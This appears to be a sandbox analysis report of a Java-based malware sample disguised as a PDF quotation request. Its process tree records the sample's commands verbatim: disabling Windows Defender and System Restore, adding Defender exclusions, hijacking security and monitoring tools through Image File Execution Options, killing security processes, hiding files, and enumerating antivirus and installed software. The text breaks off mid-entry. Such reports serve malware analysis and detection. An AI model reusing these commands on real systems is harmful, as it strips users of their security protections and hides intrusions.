PID 4420 wrote to memory of 4584	4420	cmd.exe	317
PID 4420 wrote to memory of 4584	4420	cmd.exe	317
PID 4420 wrote to memory of 4576	4420	cmd.exe	318
PID 4420 wrote to memory of 4576	4420	cmd.exe	318
PID 2788 wrote to memory of 4624	2788	java.exe	319
PID 2788 wrote to memory of 4624	2788	java.exe	319
PID 4624 wrote to memory of 4688	4624	cmd.exe	321
PID 4624 wrote to memory of 4688	4624	cmd.exe	321
PID 4624 wrote to memory of 4736	4624	cmd.exe	322
PID 4624 wrote to memory of 4736	4624	cmd.exe	322
PID 2788 wrote to memory of 4728	2788	java.exe	323
PID 2788 wrote to memory of 4728	2788	java.exe	323
PID 4728 wrote to memory of 4816	4728	cmd.exe	325
PID 4728 wrote to memory of 4816	4728	cmd.exe	325
PID 4728 wrote to memory of 4840	4728	cmd.exe	326
PID 4728 wrote to memory of 4840	4728	cmd.exe	326
PID 2788 wrote to memory of 4888	2788	java.exe	327
PID 2788 wrote to memory of 4888	2788	java.exe	327
PID 4888 wrote to memory of 4900	4888	cmd.exe	329
PID 4888 wrote to memory of 4900	4888	cmd.exe	329
PID 4888 wrote to memory of 4968	4888	cmd.exe	330
PID 4888 wrote to memory of 4968	4888	cmd.exe	330
PID 2788 wrote to memory of 4992	2788	java.exe	331
PID 2788 wrote to memory of 4992	2788	java.exe	331
PID 4992 wrote to memory of 5060	4992	cmd.exe	333
PID 4992 wrote to memory of 5060	4992	cmd.exe	333
PID 4992 wrote to memory of 5080	4992	cmd.exe	334
PID 4992 wrote to memory of 5080	4992	cmd.exe	334
PID 2788 wrote to memory of 848	2788	java.exe	335
PID 2788 wrote to memory of 848	2788	java.exe	335
PID 848 wrote to memory of 4152	848	cmd.exe	337
PID 848 wrote to memory of 4152	848	cmd.exe	337
PID 848 wrote to memory of 4160	848	cmd.exe	338
PID 848 wrote to memory of 4160	848	cmd.exe	338
PID 2788 wrote to memory of 4236	2788	java.exe	339
PID 2788 wrote to memory of 4236	2788	java.exe	339
PID 4236 wrote to memory of 2892	4236	cmd.exe	341
PID 4236 wrote to memory of 2892	4236	cmd.exe	341
PID 4236 wrote to memory of 1860	4236	cmd.exe	342
PID 4236 wrote to memory of 1860	4236	cmd.exe	342
PID 2788 wrote to memory of 4156	2788	java.exe	343
PID 2788 wrote to memory of 4156	2788	java.exe	343
PID 4156 wrote to memory of 4308	4156	cmd.exe	345
PID 4156 wrote to memory of 4308	4156	cmd.exe	345
PID 4156 wrote to memory of 4372	4156	cmd.exe	346
PID 4156 wrote to memory of 4372	4156	cmd.exe	346
PID 2788 wrote to memory of 4412	2788	java.exe	347
PID 2788 wrote to memory of 4412	2788	java.exe	347
PID 4412 wrote to memory of 4536	4412	cmd.exe	349
PID 4412 wrote to memory of 4536	4412	cmd.exe	349
PID 4412 wrote to memory of 4556	4412	cmd.exe	350
PID 4412 wrote to memory of 4556	4412	cmd.exe	350
PID 2788 wrote to memory of 4604	2788	java.exe	351
PID 2788 wrote to memory of 4604	2788	java.exe	351
PID 4604 wrote to memory of 4672	4604	cmd.exe	353
PID 4604 wrote to memory of 4672	4604	cmd.exe	353
PID 4604 wrote to memory of 4744	4604	cmd.exe	354
PID 4604 wrote to memory of 4744	4604	cmd.exe	354
PID 2788 wrote to memory of 4764	2788	java.exe	355
PID 2788 wrote to memory of 4764	2788	java.exe	355
PID 4764 wrote to memory of 4860	4764	cmd.exe	357
PID 4764 wrote to memory of 4860	4764	cmd.exe	357
PID 4764 wrote to memory of 4936	4764	cmd.exe	358
PID 4764 wrote to memory of 4936	4764	cmd.exe	358
PID 2788 wrote to memory of 4900	2788	java.exe	359
PID 2788 wrote to memory of 4900	2788	java.exe	359
PID 2788 wrote to memory of 5012	2788	java.exe	361
PID 2788 wrote to memory of 5012	2788	java.exe	361
PID 5012 wrote to memory of 4188	5012	cmd.exe	363
PID 5012 wrote to memory of 4188	5012	cmd.exe	363
PID 5012 wrote to memory of 4240	5012	cmd.exe	364
PID 5012 wrote to memory of 4240	5012	cmd.exe	364
PID 2788 wrote to memory of 3304	2788	java.exe	365
PID 2788 wrote to memory of 3304	2788	java.exe	365
PID 3304 wrote to memory of 4100	3304	cmd.exe	367
PID 3304 wrote to memory of 4100	3304	cmd.exe	367
PID 3304 wrote to memory of 4360	3304	cmd.exe	368
PID 3304 wrote to memory of 4360	3304	cmd.exe	368
PID 2788 wrote to memory of 4444	2788	java.exe	369
PID 2788 wrote to memory of 4444	2788	java.exe	369
PID 2788 wrote to memory of 4584	2788	java.exe	371
PID 2788 wrote to memory of 4584	2788	java.exe	371
PID 2788 wrote to memory of 4852	2788	java.exe	373
PID 2788 wrote to memory of 4852	2788	java.exe	373
PID 2788 wrote to memory of 4140	2788	java.exe	375
PID 2788 wrote to memory of 4140	2788	java.exe	375
PID 2788 wrote to memory of 4220	2788	java.exe	377
PID 2788 wrote to memory of 4220	2788	java.exe	377
PID 2788 wrote to memory of 4308	2788	java.exe	379
PID 2788 wrote to memory of 4308	2788	java.exe	379
PID 2788 wrote to memory of 4424	2788	java.exe	381
PID 2788 wrote to memory of 4424	2788	java.exe	381
PID 2788 wrote to memory of 4684	2788	java.exe	383
PID 2788 wrote to memory of 4684	2788	java.exe	383
PID 2788 wrote to memory of 4972	2788	java.exe	385
PID 2788 wrote to memory of 4972	2788	java.exe	385
PID 2788 wrote to memory of 3740	2788	java.exe	387
PID 2788 wrote to memory of 3740	2788	java.exe	387

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
804	attrib.exe
1004	attrib.exe
1020	attrib.exe
1208	attrib.exe
1336	attrib.exe
3912	attrib.exe
3468	attrib.exe
632	attrib.exe

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar "C:\Users\Admin\AppData\Local\Temp\Techno Group Pakistan Quotation Request_Pdf.jar"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2788
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2276
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3980
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:744
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3748
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3168
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:3912
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:3468
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\ujTBR\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:632
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\ujTBR\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:804
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\ujTBR
  2⤵
  - Views/modifies file attributes
  PID:1004
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\ujTBR
  2⤵
  - Views/modifies file attributes
  PID:1020
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\ujTBR
  2⤵
  - Views/modifies file attributes
  PID:1208
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +s +r C:\Users\Admin\ujTBR\NXtxm.class
  2⤵
  - Views/modifies file attributes
  PID:1336
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2156
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:2448
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:472
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\ujTBR','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\ujTBR\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2716
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
  2⤵
  PID:2720
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2776
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3880
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
  2⤵
  PID:1940
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:508
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3800
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
  2⤵
  PID:992
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:556
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
  2⤵
  PID:844
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3616
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:1164
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2876
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:2996
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3400
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1520
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
  2⤵
  PID:2560
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
  2⤵
  PID:1100
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2756
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
  2⤵
  PID:3860
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:396
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3800
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:1364
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2524
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:3980
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1252
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1812
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:3880
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3832
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:2560
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3604
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1100
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3808
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:508
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1004
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:636
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:64
    3⤵
    PID:1748
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:32
    3⤵
    PID:2124
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3740
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3832
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:3788
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:3168
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3616
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    PID:3308
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:2084
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:900
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:3304
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:2988
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1332
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:4000
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:3152
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1580
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:2964
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:740
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2688
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1364
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:1860
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:752
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3468
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:4024
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:2596
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1908
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:3152
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:3836
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3932
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:2272
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:1224
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1828
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:3824
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:572
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2512
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:752
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:3304
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1860
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2988
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:3792
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:540
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2272
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    PID:1216
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:752
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3640
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
    3⤵
    PID:3304
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3796
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    PID:3792
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:540
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3824
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:808
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:848
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1224
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:64
    3⤵
    PID:808
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:32
    3⤵
    PID:4112
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3744
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4164
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:4208
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:4224
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4244
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    PID:4280
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:4300
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4324
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:4360
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:4380
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4400
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    PID:4480
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:4508
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4416
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4540
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    PID:4576
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:4596
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4616
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:64
    3⤵
    PID:4652
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:32
    3⤵
    PID:4672
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4692
- - C:\Windows\system32\reg.exe
